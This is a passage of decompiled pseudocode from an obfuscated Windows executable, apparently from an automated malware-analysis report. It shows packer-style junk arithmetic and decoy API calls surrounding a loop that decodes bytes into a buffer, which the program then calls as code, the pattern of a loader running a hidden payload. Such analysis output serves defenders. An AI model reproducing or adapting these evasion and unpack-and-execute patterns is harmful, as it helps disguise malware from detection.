                                                                                                                                                                                            						 *_v344 =  *_v344 & _v212;
                                                                                                                                                                                            						 *_v232 =  *_v120 -  *_v376;
                                                                                                                                                                                            						 *_v476 = ( *_v476 & 0x0000ffff) + ( *_v60 & 0x0000ffff);
                                                                                                                                                                                            						 *_v44 = (_v13 & 0x000000ff) - ( *_v68 & 0x000000ff);
                                                                                                                                                                                            						_v168 =  *_v344 ^ _v84;
                                                                                                                                                                                            						 *0x414004 = _v452 >>  *_v40;
                                                                                                                                                                                            						_v468 =  *_v40 | _v452;
                                                                                                                                                                                            						 *_v164 =  *_v76 << _v281;
                                                                                                                                                                                            						_v156 = _v172 & 0x0000ffff & _v88 & 0x0000ffff;
                                                                                                                                                                                            						 *_v44 = ( *_v44 & 0x000000ff) - (_v13 & 0x000000ff);
                                                                                                                                                                                            						_v240 =  *_v232 +  *_v120;
                                                                                                                                                                                            						 *_v232 = _v240 + _v256;
                                                                                                                                                                                            						_v776 = _v364 - _v168;
                                                                                                                                                                                            						_v108 =  *_v344 - _v212;
                                                                                                                                                                                            						 *0x414004 =  *_v40 + _v272;
                                                                                                                                                                                            						_v357 = _v13 & 0x000000ff & _v384 & 0x000000ff;
                                                                                                                                                                                            						 *_v60 = ( *_v388 & 0x0000ffff) - (_v236 & 0x0000ffff);
                                                                                                                                                                                            						 *_v232 =  *_v120 |  *_v376;
                                                                                                                                                                                            						_v84 =  *_v344 << _v776;
                                                                                                                                                                                            						_v776 = _v364 ^  *_v344;
                                                                                                                                                                                            						_v336 = _v336 + 0xd1;
                                                                                                                                                                                            						_v256 = _v240 >>  *_v120;
                                                                                                                                                                                            						 *_v44 = (_v384 & 0x000000ff) + (_v13 & 0x000000ff);
                                                                                                                                                                                            						 *_v60 = _v172 & 0x0000ffff & _v88 & 0x0000ffff;
                                                                                                                                                                                            						 *_v40 =  *_v40 + _v468;
                                                                                                                                                                                            						 *0x414004 = _v452 -  *_v40;
                                                                                                                                                                                            						_v240 = _v24 - _v256;
                                                                                                                                                                                            						_v776 = _v108 + _v168;
                                                                                                                                                                                            						_v236 = ( *_v476 & 0x0000ffff) - (_v88 & 0x0000ffff);
                                                                                                                                                                                            						_v357 = (_v13 & 0x000000ff) + ( *_v44 & 0x000000ff);
                                                                                                                                                                                            						_v84 = _v212 -  *_v344;
						_v24 =  *_v376 &  *_v232;
						_v108 =  *_v344 | _v364;
						_v84 = _v776 >>  *_v344;
						 *0x414004 = _v468 ^  *_v40;
						 *_v68 = ( *_v68 & 0x000000ff) << (_v357 & 0x000000ff);
						_v240 =  *_v232 +  *_v376;
						_v776 =  *_v344 - _v168;
						_v776 =  *_v344 & _v108;
						_v212 = _v364 +  *_v344;
						_v84 =  *_v344 + _v776;
						 *_v40 =  *_v40 -  *0x414004;
						_v257 = _v281 - _v201;
						 *0x414004 = _v468 +  *_v40;
						 *_v60 = (_v236 & 0x0000ffff) + (_v156 & 0x0000ffff);
						_v240 =  *_v120 - _v256;
						_v240 = _v256 -  *_v120;
					} while (_v336 < 0xdc78);
					_v293 =  *_v44;
					_v340 = 0x7364;
					_v88 = _v236 & 0x0000ffff | _v172 & 0x0000ffff;
					if((_v156 & 0x0000ffff) << ( *_v476 & 0x0000ffff) >= (_v236 & 0x0000ffff ^  *_v388 & 0x0000ffff)) {
						asm("cdq");
						if(( *_v44 & 0x000000ff) >> (_v357 & 0x000000ff) == ( *_v68 & 0x000000ff) / (_v13 & 0x000000ff)) {
							_v240 = _v256 + _v24;
							E00403570();
							_v776 =  *_v344 - _v108;
							_push( &_v384);
							_push(0x65);
							_push(0x22);
							_t1993 = _v80;
							_push(_t1993);
							L0040603C();
							_v116 = _t1993;
							 *_v344 =  *_v344 & _v84;
							E00403570();
						}
					} else {
						_v212 =  *_v344 & _v776;
					}
					_v160 = 0x6112;
					if(_v452 + _v272 != _v468 +  *0x414004) {
						_v364 = _v168 >> _v212;
						if(( *_v68 & 0x000000ff) << ( *_v44 & 0x000000ff) >= (_v384 & 0x000000ff) * (_v357 & 0x000000ff)) {
							_v201 =  *_v76 + _v281;
							E004035B0( *_v68, _v256);
						}
					} else {
						_v293 = ( *_v68 & 0x000000ff) + ( *_v44 & 0x000000ff);
						_v236 =  *_v476 & 0x0000ffff ^ _v156 & 0x0000ffff;
						 *_v376 = _v240 | _v256;
					}
					_v800 = _v272;
					if(_v800 == 0x4eb) {
						 *_v40 =  *_v40 - _v272;
						E00405FE0();
					} else {
						if(_v800 == 0x5a9) {
							_v329 = _v293;
							_v88 = ( *_v476 & 0x0000ffff) + (_v172 & 0x0000ffff);
							 *0x437b84 = _v212;
							_v132 = _v240;
							_v364 = _v168 & _v108;
							_v776 = _v108 -  *_v344;
						}
					}
					_v252 =  *_v120;
					_v460 =  &_v84;
					while(_v160 != 0x6ff1) {
						 *_v68 = ( *_v68 & 0x000000ff) + ( *_v44 & 0x000000ff);
						_v160 = _v160 + 0x2f;
						_v156 = ( *_v388 & 0x0000ffff) + ( *_v60 & 0x0000ffff);
						_v212 =  *_v460 - _v776;
						 *0x414004 = _v468 | _v272;
						_v776 =  *_v460 ^ _v108;
						 *_v344 = _v776 <<  *_v460;
						 *_v68 = (_v384 & 0x000000ff) >> ( *_v44 & 0x000000ff);
						_v236 =  *_v476 & 0x0000ffff &  *_v388 & 0x0000ffff;
						_v452 = _v272 -  *_v40;
						_v201 =  *_v164 +  *_v76;
						_v24 = _v252 + _v240;
						 *_v344 =  *_v344 -  *_v460;
						 *_v476 = ( *_v388 & 0x0000ffff) - (_v156 & 0x0000ffff);
						_v357 =  *_v68 & 0x000000ff & _v329 & 0x000000ff;
						_v240 = _v252 +  *_v376;
						_v212 =  *_v344 -  *_v460;
						_v776 = _v212 + _v168;
					}
					do {
						_v256 =  *_v120 >> _v132;
						_v172 = _v236 & 0x0000ffff | _v156 & 0x0000ffff;
						 *_v44 =  *_v44 & 0x000000ff ^ _v357 & 0x000000ff;
						_v84 =  *_v460 << _v776;
						 *0x437b84 = _v364 & _v108;
						_v256 = _v24 +  *_v120;
						_v212 = _v776 -  *_v344;
						_v84 =  *_v344 + _v168;
						_v201 = _v257 - _v281;
						 *_v40 = _v452 - _v468;
						_v329 = (_v13 & 0x000000ff) + (_v293 & 0x000000ff);
						_v88 =  *_v60 & 0x0000ffff & _v156 & 0x0000ffff;
						_v240 = _v252 - _v256;
						 *0x437b84 = _v108 << _v84;
						_v88 = _v156 & 0x0000ffff ^  *_v388 & 0x0000ffff;
						_v384 = _v329 & 0x000000ff | _v293 & 0x000000ff;
						_v256 =  *_v120 >> _v252;
						_v108 = _v212 +  *_v460;
						_v212 =  *_v344 &  *_v460;
						_v256 = _v252 -  *_v120;
						 *_v476 = ( *_v60 & 0x0000ffff) + ( *_v388 & 0x0000ffff);
						_v357 = ( *_v68 & 0x000000ff) + ( *_v44 & 0x000000ff);
						 *0x437b84 =  *_v344 +  *_v460;
						_v212 =  *_v460 - _v84;
						_v257 =  *_v164 +  *_v76;
						 *_v40 = _v468 - _v452;
						 *_v60 = _v156 & 0x0000ffff & _v172 & 0x0000ffff;
						QueryPerformanceFrequency( &_v196);
						_v64 = _v64 - 0x10;
						_v384 = _v329 & 0x000000ff ^ _v13 & 0x000000ff;
						_v252 = _v240 >> _v132;
						_v132 =  *_v232 | _v252;
						 *_v344 = _v776 << _v84;
						 *0x437b84 =  *_v344 - _v84;
						_v776 = _v108 -  *_v460;
						 *_v476 = _v236 & 0x0000ffff & _v156 & 0x0000ffff;
						_v293 = ( *_v68 & 0x000000ff) + ( *_v44 & 0x000000ff);
						 *_v120 =  *_v376 + _v256;
						 *_v460 = _v168 + _v108;
						_v212 =  *_v460 - _v108;
						 *_v120 =  *_v376 - _v252;
						_v156 = (_v172 & 0x0000ffff) - ( *_v60 & 0x0000ffff);
						_v13 = (_v329 & 0x000000ff) + (_v357 & 0x000000ff);
						 *0x414004 =  *_v40 - _v452;
						_v281 = _v201 ^ _v257;
						 *_v376 =  *_v120 |  *_v232;
						_v364 = _v108 << _v84;
						_v357 = (_v329 & 0x000000ff) >> ( *_v44 & 0x000000ff);
						 *_v476 =  *_v476 & 0x0000ffff &  *_v60 & 0x0000ffff;
						_v84 = _v168 - _v364;
						 *_v120 =  *_v120 +  *_v376;
					} while (_v64 > 0xa1cb);
					while(_v416 <= 0x54aa) {
						_v212 =  *_v344 &  *_v460;
						 *0x437b84 =  *_v344 -  *_v460;
						_v236 = (_v88 & 0x0000ffff) - (_v156 & 0x0000ffff);
						 *_v68 = ( *_v44 & 0x000000ff) + (_v357 & 0x000000ff);
						_v416 = _v416 + 0x2b;
						_v132 = _v240 + _v252;
						_v364 = _v108 + _v776;
						_v364 = _v84 <<  *_v460;
						_v84 =  *_v344 >> _v108;
						_v212 = _v364 |  *_v344;
						_v272 =  *_v40 ^ _v468;
						 *_v164 =  *_v76 & _v257;
						_v236 = ( *_v476 & 0x0000ffff) + (_v88 & 0x0000ffff);
						 *_v44 = ( *_v68 & 0x000000ff) + (_v13 & 0x000000ff);
						_v252 =  *_v376 -  *_v120;
						_v256 =  *_v120 + _v132;
						_v236 =  *_v476 & 0x0000ffff & _v172 & 0x0000ffff;
					}
					_v96 =  &_v329;
					_v212 = _v776 *  *_v344;
					_v112 = _v240;
                                                                                                                                                                                            					 *0x436b88 = ( *_v476 & 0x0000ffff) + (_v156 & 0x0000ffff);
                                                                                                                                                                                            					_v364 =  *_v460 -  *_v344;
                                                                                                                                                                                            					if(_v281 -  *_v164 < _v201 - _v257) {
                                                                                                                                                                                            						_v168 =  *_v344 >> _v776;
                                                                                                                                                                                            						_v156 = _v172 & 0x0000ffff ^  *0x436b88 & 0x0000ffff;
                                                                                                                                                                                            						_v293 = (_v384 & 0x000000ff) << ( *_v68 & 0x000000ff);
                                                                                                                                                                                            						E00403570();
                                                                                                                                                                                            					}
                                                                                                                                                                                            					_v348 =  *_v376;
                                                                                                                                                                                            					if((_v468 |  *_v40) < (_v452 & _v272)) {
                                                                                                                                                                                            						 *_v460 =  *_v344 + _v84;
                                                                                                                                                                                            						_v452 =  *_v40 + _v468;
                                                                                                                                                                                            						_v281 = _v201 -  *_v164;
                                                                                                                                                                                            						E00403570();
                                                                                                                                                                                            						 *0x436b88 = (_v88 & 0x0000ffff) + (_v236 & 0x0000ffff);
                                                                                                                                                                                            						_v357 = (_v384 & 0x000000ff) - ( *_v96 & 0x000000ff);
                                                                                                                                                                                            					}
                                                                                                                                                                                            					if( *_v40 * _v452 >= (_v272 & _v468)) {
                                                                                                                                                                                            						_push( &_v144);
                                                                                                                                                                                            						_push(0xf5);
                                                                                                                                                                                            						_t1921 =  &_v476;
                                                                                                                                                                                            						_push(_t1921);
                                                                                                                                                                                            						_push(_v80);
                                                                                                                                                                                            						L0040602A();
                                                                                                                                                                                            						_v144 = _t1921;
                                                                                                                                                                                            						 *_v232 =  *_v376 + _v252;
                                                                                                                                                                                            						E00405FE0();
                                                                                                                                                                                            						 *_v344 = _v776 -  *_v460;
                                                                                                                                                                                            					}
                                                                                                                                                                                            					_v364 =  *_v344 - _v168;
                                                                                                                                                                                            					_v252 =  *_v120 >>  *_v376;
                                                                                                                                                                                            					if(( *_v60 & 0x0000ffff ^  *_v388 & 0x0000ffff) < ( *_v476 & 0x0000ffff) << (_v172 & 0x0000ffff)) {
                                                                                                                                                                                            						L119:
                                                                                                                                                                                            						E004034C0(_v272 & 0x0000ffff,  *_v40 & 0x0000ffff,  *_v76 & 0x000000ff,  *_v120);
                                                                                                                                                                                            						_t3173 = _t3173 + 0x10;
                                                                                                                                                                                            						goto L120;
                                                                                                                                                                                            					} else {
                                                                                                                                                                                            						_v124 =  *_v460;
                                                                                                                                                                                            						_v156 =  *_v476 & 0x0000ffff |  *_v60 & 0x0000ffff;
                                                                                                                                                                                            						if( *_v40 *  *0x414004 == (_v272 & _v452)) {
                                                                                                                                                                                            							L118:
                                                                                                                                                                                            							_v384 = (_v329 & 0x000000ff) - ( *_v44 & 0x000000ff);
                                                                                                                                                                                            							 *0x437b84 =  *_v344 -  *_v460;
                                                                                                                                                                                            							goto L119;
                                                                                                                                                                                            						} else {
                                                                                                                                                                                            							goto L55;
                                                                                                                                                                                            						}
                                                                                                                                                                                            						do {
                                                                                                                                                                                            							L55:
                                                                                                                                                                                            							_v340 = _v340 + 0xb8;
                                                                                                                                                                                            							_v24 =  *_v376 + _v348;
                                                                                                                                                                                            							_v108 = _v776 + _v212;
                                                                                                                                                                                            							_v84 =  *_v460 +  *_v344;
                                                                                                                                                                                            							_v156 = ( *_v60 & 0x0000ffff) + ( *_v388 & 0x0000ffff);
                                                                                                                                                                                            							 *_v96 = _v329 & 0x000000ff &  *_v68 & 0x000000ff;
                                                                                                                                                                                            							 *_v40 =  *_v40 -  *0x414004;
                                                                                                                                                                                            							_v201 = _v281 >>  *_v164;
                                                                                                                                                                                            							_v240 = _v252 ^ _v24;
                                                                                                                                                                                            							 *0x437b84 = _v84 << _v108;
                                                                                                                                                                                            							_v357 = _v13 & 0x000000ff |  *_v68 & 0x000000ff;
                                                                                                                                                                                            							_v156 = (_v236 & 0x0000ffff) - (_v88 & 0x0000ffff);
                                                                                                                                                                                            							 *_v120 = _v24 & _v252;
                                                                                                                                                                                            							_v364 =  *_v460 + _v124;
                                                                                                                                                                                            							_t2816 =  *0x437b84; // 0x1c000000
                                                                                                                                                                                            							_v108 = _t2816 +  *_v460;
                                                                                                                                                                                            							_v348 = _v256 - _v24;
                                                                                                                                                                                            							_v88 = ( *_v388 & 0x0000ffff) + ( *_v476 & 0x0000ffff);
                                                                                                                                                                                            						} while (_v340 <= 0x969c);
                                                                                                                                                                                            						if((_v13 & 0x000000ff) - (_v293 & 0x000000ff) != ( *_v68 & 0x000000ff) + (_v384 & 0x000000ff)) {
                                                                                                                                                                                            							_v329 = ( *_v44 & 0x000000ff) - ( *_v68 & 0x000000ff);
                                                                                                                                                                                            							_t1918 =  *0x437b84; // 0x1c000000
                                                                                                                                                                                            							E00403520(_v776, _v108, _t1918,  *_v344, _v776);
                                                                                                                                                                                            							 *_v344 = _v84 &  *_v460;
                                                                                                                                                                                            						}
                                                                                                                                                                                            						_v408 =  *_v344;
                                                                                                                                                                                            						 *_v232 = _v348 ^  *_v120;
                                                                                                                                                                                            						_v804 = _v132;
                                                                                                                                                                                            						if(_v804 == 0x2e23) {
                                                                                                                                                                                            							E004035E0(_v240, _v212);
                                                                                                                                                                                            							goto L117;
                                                                                                                                                                                            						} else {
                                                                                                                                                                                            							_v472 = GetProcessHeap();
                                                                                                                                                                                            							_v236 = ( *0x436b88 & 0x0000ffff) + ( *_v388 & 0x0000ffff);
                                                                                                                                                                                            							_v808 = _v84;
                                                                                                                                                                                            							if(_v808 == 0x5181) {
                                                                                                                                                                                            								_v172 = ( *_v60 & 0x0000ffff) - (_v236 & 0x0000ffff);
                                                                                                                                                                                            								_v13 = (_v384 & 0x000000ff) - ( *_v96 & 0x000000ff);
                                                                                                                                                                                            								E00403440(_v172, _v24);
                                                                                                                                                                                            							} else {
                                                                                                                                                                                            								if(_v808 == 0x1c000000) {
                                                                                                                                                                                            									_v812 =  *_v76;
                                                                                                                                                                                            									if(_v812 == 0) {
                                                                                                                                                                                            										_v381 =  *_v68;
                                                                                                                                                                                            										 *0x414006 = _v281 >>  *_v76;
                                                                                                                                                                                            										_v236 = ( *_v476 & 0x0000ffff) << (_v172 & 0x0000ffff);
                                                                                                                                                                                            										_v380 =  *_v344;
                                                                                                                                                                                            										_v212 =  *_v460 |  *_v344;
                                                                                                                                                                                            									} else {
                                                                                                                                                                                            										if(_v812 == 0x71) {
                                                                                                                                                                                            											 *_v120 = _v240 - _v112;
                                                                                                                                                                                            											_v124 = _v776 +  *_v344;
                                                                                                                                                                                            											 *_v460 =  *_v344 + _v108;
                                                                                                                                                                                            											_v256 =  *_v232 + _v112;
                                                                                                                                                                                            										}
                                                                                                                                                                                            									}
                                                                                                                                                                                            									_v52 =  &_v468;
                                                                                                                                                                                            									_v257 = _v281 ^ _v201;
                                                                                                                                                                                            									_v432 = _v172;
                                                                                                                                                                                            									_v329 = (_v357 & 0x000000ff) * ( *_v68 & 0x000000ff);
                                                                                                                                                                                            									_v480 = _v24;
                                                                                                                                                                                            									_v24 = _v240 &  *_v232;
                                                                                                                                                                                            									_t1697 = _v124 - _v380;
                                                                                                                                                                                            									_v364 = _t1697;
                                                                                                                                                                                            									_v816 = _v381;
                                                                                                                                                                                            									if(_v816 == 0x2f) {
                                                                                                                                                                                            										_push(_v36);
                                                                                                                                                                                            										L00406036();
                                                                                                                                                                                            										_v420 = _t1697;
                                                                                                                                                                                            										 *_v232 =  *_v232 |  *_v376;
                                                                                                                                                                                            										E00405FE0();
                                                                                                                                                                                            									} else {
                                                                                                                                                                                            										if(_v816 == 0xf3) {
                                                                                                                                                                                            											_v212 =  *_v344 - _v364;
                                                                                                                                                                                            											E00403480(_v432 & 0x0000ffff, _v272 & 0x0000ffff, _v468 & 0x0000ffff);
                                                                                                                                                                                            											_v212 =  *_v344 &  *_v460;
                                                                                                                                                                                            											 *_v44 = (_v357 & 0x000000ff) + (_v13 & 0x000000ff);
											_v156 = ( *_v388 & 0x0000ffff) - ( *_v476 & 0x0000ffff);
											_v240 =  *_v120 -  *_v376;
											_v84 = _v108 + _v408;
											_v124 =  *_v460 + _v364;
										}
									}
									_v248 =  &_v13;
									_v172 = ( *0x436b88 & 0x0000ffff) >> (_v432 & 0x0000ffff);
									_v304 = _v468;
									_v448 =  &_v281;
									_v400 = CreateEventW(0, 0, 0, 0);
									_v256 =  *_v376 <<  *_v120;
									_v48 = _v84;
									_v13 = _v293 & 0x000000ff ^ _v381 & 0x000000ff;
									 *_v476 = _v236 & 0x0000ffff &  *0x436b88 & 0x0000ffff;
									_v368 =  *_v460;
									do {
										_v176 = _v176 + 0xb5;
										 *_v232 = _v132 - _v24;
										_v364 =  *_v460 +  *_v344;
										_v108 = _v368 + _v168;
										_v384 = (_v381 & 0x000000ff) + (_v13 & 0x000000ff);
									} while (_v176 <= 0xe9c3);
									_v136 = 0xabb7a47c;
									_v156 =  *_v60 & 0x0000ffff &  *_v476 & 0x0000ffff;
									if( *_v76 - _v257 <  *_v164 - _v281) {
										if( *_v52 +  *_v40 <= _v272 - _v304) {
											_v776 =  *_v460 | _v108;
										}
										L114:
										_v240 =  *_v232 >>  *_v376;
										 *_v460 =  *_v344 << _v408;
										 *0x437b84 = _v408 ^  *_v460;
										L116:
										_v293 = _v13 & 0x000000ff &  *_v68 & 0x000000ff;
										_t1682 = _v468 - _v452;
										 *0x414004 = _t1682;
										_push(_v72);
										L00406036();
										_v444 = _t1682;
										 *_v344 =  *_v460 + _v124;
										E00403480(_v156 & 0x0000ffff,  *_v40 & 0x0000ffff,  *_v40 & 0x0000ffff);
										L117:
										_t2825 =  *0x437b84; // 0x1c000000
										_v168 = _t2825 << _v84;
										_v108 =  *_v344 >>  *_v460;
										 *_v164 =  *_v76 | _v201;
										_push( *_v388 & 0x0000ffff);
										_push( *_v96 & 0x000000ff);
										E00405F90(_v201 & 0x000000ff);
										_t3173 = _t3173 + 0xc;
										_v468 =  *_v40 - _v452;
										goto L118;
									}
									_v820 = _v168;
									if(_v820 == 0x75b0) {
										_v364 =  *_v344 &  *_v460;
										_v304 =  *_v52 +  *_v40;
										E004035E0( *_v120,  *_v460);
									}
									_v136 = _v136 ^ 0xabb3a47c;
									_t1732 = GetLogicalDrives(); // executed
									_v32 = _t1732;
									_v461 =  *_v448;
									_v268 = 0x1488d2df;
									 *_v96 = ( *_v44 & 0x000000ff) + (_v329 & 0x000000ff);
									_v236 = ( *_v60 & 0x0000ffff) + (_v432 & 0x0000ffff);
									_v456 = _v348;
									_v268 = _v268 ^ 0x1488c229;
									_v112 =  *_v232 - _v348;
									 *0x437b80 = 0x414006;
									_v392 = _v268;
									_v148 =  &_v156;
									_v329 = ( *_v44 & 0x000000ff) - (_v384 & 0x000000ff);
									_v408 =  *_v344 * _v368;
									_v356 =  &_v132;
									_v364 =  *_v344 &  *_v460;
									_v288 =  *_v460;
									_v236 = ( *_v148 & 0x0000ffff) + (_v432 & 0x0000ffff);
									_v383 = _v381;
									 *0x437b88 =  *_v248;
									_v780 = _v152(_v136, _v268, _v392);
									 *_v356 = _v112 - _v252;
									_v100 = CreateFileW(L"de7z0WJA4\\fa\\yMszmIm", 0x80000000, 2, 0, 4, 8, 0);
									_t2338 =  *0x437b80; // 0x414006
									if( *_v448 -  *_v76 >  *_v164 <<  *_t2338) {
										asm("cdq");
										if(( *_v344 | _v364) <=  *_v460 /  *0x437b84) {
											_v201 =  *_v76 & _v461;
										}
										goto L111;
									} else {
										 *_v60 = ( *_v476 & 0x0000ffff) + (_v172 & 0x0000ffff);
										_v433 =  *_v248;
										_t2911 =  *0x437b80; // 0x414006
										if( *_t2911 + _v281 >= _v201 -  *_v164) {
											if(( *_v248 & 0x000000ff) + (_v381 & 0x000000ff) == (_v329 & 0x000000ff) - (_v433 & 0x000000ff)) {
												L108:
												 *_v356 =  *_v120 -  *_v232;
												_v84 =  *_v460 & _v288;
												 *0x437b84 =  *_v460 +  *_v344;
												L111:
												 *_v460 =  *_v460 ^  *_v344;
												_v272 = _v304 >>  *_v40;
												goto L114;
											}
											_v28 = _v780;
											_v368 =  *_v344 >>  *_v460;
											_v328 = CreateFileW(L"Yl77GRFLUv\\yB2EF3", 0x80000000, 4, 0, 2, 0x400, 0);
											_v20 =  &_v432;
											_v329 =  *_v248 & 0x000000ff |  *_v44 & 0x000000ff;
											_v440 = 0x764a6e1b;
											_v264 =  &_v288;
											_v824 =  *_v448;
											if(_v824 == 0) {
												if(( *_v40 ^  *_v52) <= _v452 - _v304) {
													E00403440( *_v476, _v240);
													_v24 =  *_v232 &  *_v120;
												}
											} else {
												if(_v824 == 0x65) {
													 *_v344 =  *_v460 - _v108;
												}
											}
											_v104 = 0x14;
											if(_v468 - _v272 < _v452 - _v304) {
												if( *_v356 +  *_v376 != _v256 + _v240) {
													_v240 = _v24 >>  *_v232;
												}
											} else {
												_v408 =  *_v344 + _v48;
												 *0x437b90 =  &_v88;
												_v305 = _v381;
												_v236 = (_v172 & 0x0000ffff) + (_v432 & 0x0000ffff);
												_v312 =  *_v40;
												_v257 =  *_v164 &  *_v448;
											}
											_v404 = GetCurrentProcess();
											_v288 = _v108 ^  *_v264;
											_v292 = _v140;
											if( *_v356 <<  *_v376 < ( *_v232 | _v480)) {
												L107:
												_push( *_v148 & 0x0000ffff);
												_push( *_v96 & 0x000000ff);
												E00405F90( *_v448 & 0x000000ff);
												_t3173 = _t3173 + 0xc;
												goto L108;
											} else {
												_v208 = _v88;
												_v329 = (_v357 & 0x000000ff) + (_v383 & 0x000000ff);
												_v180 = _v408;
												 *_v460 =  *_v460 -  *_v264;
												_v348 = _v240 & _v252;
												_v228 = 0xb919b905;
												_v276 = _v172;
												 *_v96 = ( *_v44 & 0x000000ff) + (_v293 & 0x000000ff);
												_v280 =  *_v344;
												_v228 = _v228 ^ 0xb86da7ea;
												_v372 = CreateMutexW(0, 0, 0);
												 *_v344 =  *_v264 -  *_v460;
												if(_v461 +  *_v76 != _v281 + _v257) {
                                                                                                                                                                                            													L106:
                                                                                                                                                                                            													_v132 = _v252 - _v456;
                                                                                                                                                                                            													goto L107;
                                                                                                                                                                                            												}
                                                                                                                                                                                            												 *0x436b8c =  *_v264 -  *_v344;
                                                                                                                                                                                            												_v92 = _v380;
                                                                                                                                                                                            												while(_v104 < _v228) {
                                                                                                                                                                                            													_t2421 =  *0x437b80; // 0x414006
                                                                                                                                                                                            													_v461 =  *_t2421 - _v201;
                                                                                                                                                                                            													 *_v52 =  *_v40 + _v468;
                                                                                                                                                                                            													_v432 =  *_v476 & 0x0000ffff |  *_v388 & 0x0000ffff;
                                                                                                                                                                                            													 *_v248 = (_v433 & 0x000000ff) << ( *_v96 & 0x000000ff);
                                                                                                                                                                                            													_v125 =  *_v292;
                                                                                                                                                                                            													_v252 = _v240 >> _v132;
                                                                                                                                                                                            													_t2429 =  *0x437b84; // 0x1c000000
                                                                                                                                                                                            													_v84 = _t2429 ^  *_v344;
                                                                                                                                                                                            													_v276 =  *_v148 & 0x0000ffff &  *_v60 & 0x0000ffff;
                                                                                                                                                                                            													_t2433 =  *0x437b90; // 0x0
                                                                                                                                                                                            													 *_t2433 = (_v236 & 0x0000ffff) + ( *_v148 & 0x0000ffff);
                                                                                                                                                                                            													_v132 = _v240 + _v456;
                                                                                                                                                                                            													asm("ror al, cl");
                                                                                                                                                                                            													_v84 = _v364 &  *_v460;
                                                                                                                                                                                            													_v280 =  *_v344 -  *_v264;
                                                                                                                                                                                            													_v256 = _v112 - _v24;
                                                                                                                                                                                            													 *_v96 = ( *_v248 & 0x000000ff) - (_v384 & 0x000000ff);
                                                                                                                                                                                            													 *_v476 = ( *_v388 & 0x0000ffff) + ( *_v60 & 0x0000ffff);
                                                                                                                                                                                            													_v125 = (_v125 & 0x000000ff) - _v440;
                                                                                                                                                                                            													_v168 = _v368 -  *0x436b8c;
                                                                                                                                                                                            													_v364 = _v280 |  *_v344;
                                                                                                                                                                                            													_t1852 =  *0x437b80; // 0x414006
                                                                                                                                                                                            													 *_t1852 =  *_v76 << _v201;
                                                                                                                                                                                            													_v468 = _v312 >> _v304;
                                                                                                                                                                                            													_v236 = _v208 & 0x0000ffff ^  *_v148 & 0x0000ffff;
                                                                                                                                                                                            													_v433 =  *_v44 & 0x000000ff &  *_v96 & 0x000000ff;
                                                                                                                                                                                            													 *_v28 = _v125;
                                                                                                                                                                                            													 *_v232 = _v240 + _v256;
                                                                                                                                                                                            													_v240 = _v112 +  *_v376;
                                                                                                                                                                                            													_v292 = _v292 + 1;
                                                                                                                                                                                            													_v380 = _v368 + _v212;
                                                                                                                                                                                            													_v108 = _v124 - _v168;
                                                                                                                                                                                            													_v428 = CreateFileW(L"QY\\UPMBHwXRVj\\Xlb\\aNYnG", 0x40000000, 8, 0, 5, 0x20, 0);
                                                                                                                                                                                            													 *_v460 =  *_v460 & _v84;
                                                                                                                                                                                            													_v28 = _v28 + 1;
                                                                                                                                                                                            													_v172 = (_v208 & 0x0000ffff) - (_v156 & 0x0000ffff);
                                                                                                                                                                                            													 *0x437b88 = ( *_v68 & 0x000000ff) + ( *_v248 & 0x000000ff);
                                                                                                                                                                                            													 *_v356 = _v240 - _v132;
                                                                                                                                                                                            													_v776 =  *_v460 -  *_v344;
                                                                                                                                                                                            													 *_v460 = _v180 << _v212;
                                                                                                                                                                                            													asm("ror ecx, 0x1b");
                                                                                                                                                                                            													_v348 = _v456 |  *_v376;
                                                                                                                                                                                            													 *_v68 = ( *0x437b88 & 0x000000ff) >> (_v329 & 0x000000ff);
                                                                                                                                                                                            													_v88 = _v432 & 0x0000ffff ^ _v276 & 0x0000ffff;
                                                                                                                                                                                            													_v468 =  *_v52 & _v304;
                                                                                                                                                                                            													_v281 = _v257 +  *_v76;
                                                                                                                                                                                            													 *0x414004 =  *_v52 +  *_v40;
                                                                                                                                                                                            													_v440 = _v440 + 0x8c75;
                                                                                                                                                                                            													_v184 = IsProcessorFeaturePresent(3);
                                                                                                                                                                                            													_v92 =  *_v460 +  *_v344;
                                                                                                                                                                                            													_v383 = ( *_v248 & 0x000000ff) - (_v357 & 0x000000ff);
                                                                                                                                                                                            													_v104 = _v104 + 0x226a7;
                                                                                                                                                                                            													_t1884 =  *0x437b90; // 0x0
                                                                                                                                                                                            													 *_v20 = ( *_t1884 & 0x0000ffff) - ( *_v388 & 0x0000ffff);
                                                                                                                                                                                            													 *_v460 =  *_v264 &  *_v344;
                                                                                                                                                                                            												}
                                                                                                                                                                                            												if(_v452 -  *_v52 >= _v304 + _v468) {
                                                                                                                                                                                            													 *_v264 =  *_v344 |  *_v460;
                                                                                                                                                                                            												} else {
                                                                                                                                                                                            													_v224 = _v780 + 0xad;
                                                                                                                                                                                            													if(_v201 >>  *_v76 != ( *_v164 &  *_v448)) {
                                                                                                                                                                                            														 *_v264 =  *_v344 +  *_v460;
                                                                                                                                                                                            														E00403440( *_v60, _v240);
                                                                                                                                                                                            														_v433 = ( *0x437b88 & 0x000000ff) - ( *_v44 & 0x000000ff);
                                                                                                                                                                                            														 *0x436b88 = (_v236 & 0x0000ffff) + (_v156 & 0x0000ffff);
                                                                                                                                                                                            													}
                                                                                                                                                                                            													_v220 = _v140 + 0xad;
                                                                                                                                                                                            													_v240 =  *_v356 +  *_v376;
                                                                                                                                                                                            													 *_v460 = _v368 - _v108;
                                                                                                                                                                                            													_v396 =  &_v124;
                                                                                                                                                                                            													_v84 =  *_v264 + _v124;
                                                                                                                                                                                            													_v200 = _v364;
                                                                                                                                                                                            													_v257 =  *_v448 &  *_v164;
                                                                                                                                                                                            													_v8 =  &_v468;
                                                                                                                                                                                            													_v780( &_v224);
                                                                                                                                                                                            													_v88 = (_v172 & 0x0000ffff) - (_v236 & 0x0000ffff);
                                                                                                                                                                                            													 *0x437b8c =  &_v357;
                                                                                                                                                                                            													_v12 =  *_v120;
                                                                                                                                                                                            													_v112 =  *_v376 ^ _v456;
                                                                                                                                                                                            													_v409 =  *_v44;
                                                                                                                                                                                            													_v276 = _v156 & 0x0000ffff | _v88 & 0x0000ffff;
                                                                                                                                                                                            												}
                                                                                                                                                                                            												_v240 = _v24 ^ _v252;
                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                            											}
                                                                                                                                                                                            										}
                                                                                                                                                                                            										_v112 =  *_v356 << _v240;
                                                                                                                                                                                            										goto L108;
                                                                                                                                                                                            									}
                                                                                                                                                                                            								}
                                                                                                                                                                                            							}
                                                                                                                                                                                            							goto L116;
                                                                                                                                                                                            						}
                                                                                                                                                                                            					}
                                                                                                                                                                                            				} else {
